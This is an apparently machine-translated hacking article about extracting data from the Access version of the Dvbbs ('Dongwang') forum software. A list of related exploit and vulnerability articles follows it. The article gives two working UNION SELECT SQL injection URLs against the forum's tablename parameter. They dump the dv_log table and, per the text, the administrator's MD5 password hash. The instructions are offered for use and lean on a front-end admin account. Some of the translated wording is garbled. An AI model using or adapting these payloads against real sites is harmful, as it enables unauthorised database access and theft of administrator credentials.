The ultimate log library for the access version of the dynamic network
Note: You need to obtain the front-end administrator permission before using it
In the article, specify ?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_id=5%20union%20select%201,1,1,1,1%20from%20dv_bbs1&page=2000 (id of the last page of the recycling bin), which means changing the value of l_id='' to burst out the value of l_concent can only burst one content at a time. After looking at the database table of Dongwang, just specify l_a nnounceid=0 can all be broken out. The statement is constructed in this way?tablename=Dv_bbs1%20union%20select%201,1,l_content,1,1,1%20from%20dv_log%20where%20l_announceid=0%20union%20select%201,1,1,1,1%20from%20dv_bbs1&page=2000 Hehe, are all broken out? Constructing appropriate statements can break out the administrator's background md5 value and other content. Also note: The content of the burst data field is the last page of the Recycle Bin post!
Related Articles
Cross-library query for Access (picture)
Cross-library query for Access (Figure)...2007-01-01The shellcode source code of the "shockwave" virus
The shellcode source code of the "shockwave" virus...2007-01-01Preliminary study on online payment loopholes in cloud network (photo)
This article mainly introduces the preliminary exploration of online payment vulnerabilities in cloud network2007-01-01Details of fckeditor vulnerability
Fckeditor's vulnerability details...2007-02-02Honeypot Technology: Eliminate Firewall Limits and Fragility
Honeypot Technology: Eliminates the limitations and fragility of firewalls...2007-01-01"Gray Dove" web * from principle, production to prevention (photo)
"Gray Dove" web * from principle, production to prevention (picture)...2007-01-01Analysis of the footprints left by entering Win2000
Analysis of the footprints left by entering Win2000...2007-01-01Also talk about cross-site utilization
Also talk about cross-site utilization...2007-04-04phpwind management permission leak exploit program release
phpwind is a very widely used program in China. Due to errors in programming, anyone can obtain the permissions of front-end administrators and slut masters, and do any operations such as deleting posts.2008-06-06WordPress download monitoring plugin id parameter SQL injection vulnerability
Release time: 2008-04-28 Update time: 2008-04-30 Hazard level: ★★★☆☆☆ Affected version: WordPress Download Monitor 2.0.6 describe: BUGTRAQ ID: 289752008-05-05